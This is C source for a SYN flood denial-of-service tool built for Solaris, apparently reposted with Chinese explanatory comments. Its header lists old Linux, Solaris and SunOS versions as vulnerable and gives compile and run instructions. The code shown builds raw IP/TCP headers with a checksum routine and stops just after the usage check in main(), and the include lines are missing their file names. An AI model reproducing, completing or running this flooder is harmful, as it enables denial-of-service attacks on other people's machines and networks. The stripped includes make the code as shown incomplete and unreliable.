/*　syn　attack　against　a　port　for　solaris　*/

/*　original　land　attack,　land.c　by　m3lt,　flc　*/

/*　ported　to　44bsd　by　blast　and　jerm　*/

/*　ported　to　solaris　by　ziro　antagonist　*/

/*　referenced　flood.c　by　unknown　author　*/

/*　converted　into　a　syn　attack　against　one　port　by　crg　*/

/*　please　use　this　for　educational　purposes　only　*/

/*　compiles　on　solaris　gcc　-o　synsol　synsol.c　-lsocket　-lnsl　*/

/*　additional　notes:　*/

/*　successfully　compiled　on　solaris　2.51　and　2.6　*/

/*　runs:　synsol　　　　*/

/*　*/

/*　tested　it　on:　solaris　2.6　*/

/*　*/

/*　attacked　against:　*/

/*　linux　2.0.33　-　vulnerable　*/

/*　linux　2.0.30　-　vulnerable　*/

/*　linux　1.2.13　-　vulnerable　*/

/*　solaris　2.4　-　vulnerable　*/

/*　solaris　2.5.1　-　vulnerable　*/

/*　sunos　4.1.3_u3　-　vulnerable　*/

/*　solaris　2.6　-　not　vulnerable　*/

/*　*/

/*　most　of　these　test　machines　are　not　patched　because　they　*/

/*　are　in　test　lab.　i　tested　the　program　against　port　23　and　*/

/*　every　once　in　awhile　i　did　get　through.　*/

/*　*/

/*　direct　any　comments,　questions,　improvements　to　*/

/*　packetstorm@genocide2600.com　*/

/*　http://www.genocide2600.com/~tattooman/　*/

/*　your　emails　will　be　forwarded　to　the　author,　who　wishes　*/

/*　to　remain　known　only　as　crg　(no　email　addy　or　url)　*/

/*jjgirl:上面的注释的不用说了！*/

#include　

#include　

#include　

#include　

#include　

#include　

#include　

#include　

#include　

#include　

#include　

#include　

#include　

#include　

#include　

#include　

/*jjgirl:上面是头文件！*/

unsigned　long　srcport;

struct　pseudohdr

{

struct　in_addr　saddr;

struct　in_addr　daddr;

u_char　zero;

u_char　protocol;

u_short　length;

struct　tcphdr　tcpheader;

};

/*jjgirl:定义一个伪装地址的结构！*/

u_short　checksum(u_short　*　data,u_short　length)

{

int　nleft　=　length;

int　sum=0;

unsigned　short　*w　=　data;

unsigned　short　value　=　0;

while　(nleft　>　1)　{

sum　+=　*w++;

nleft　-=　2;

}

if　(nleft　==　1)　{

*(unsigned　char　*)　(&value)　=　*(unsigned　char　*)　w;

sum　+=　value;

}

sum　=　(sum　>>16)　+　(sum　&　0xffff);

sum　+=　(sum　>>　16);

value　=　~sum;

return(value);

}

/*jjgirl:上面校验文件！包头是需要校验的，crc校验！*/

int　main(int　argc,char　*　*　argv)

{/*jjgirl:主程序开始了！*/

struct　sockaddr_in　sin;

struct　sockaddr_in　din;

struct　hostent　*　hoste;

struct　hostent　*　host1;

int　j,sock,foo,　flooddot=1;

char　buffer[40];

struct　ip　*　ipheader=(struct　ip　*)　buffer;

struct　tcphdr　*　tcpheader=(struct　tcphdr　*)　(buffer+sizeof(struct　ip));

struct　pseudohdr　pseudoheader;

/*jjgirl:上面定义变量！*/

fprintf(stderr,"syn　attack　against　one　port.(infinite)\n");

if(argc<4)

{

fprintf(stderr,"usage:　%s　　　\n",argv[0]);

return(-1);

}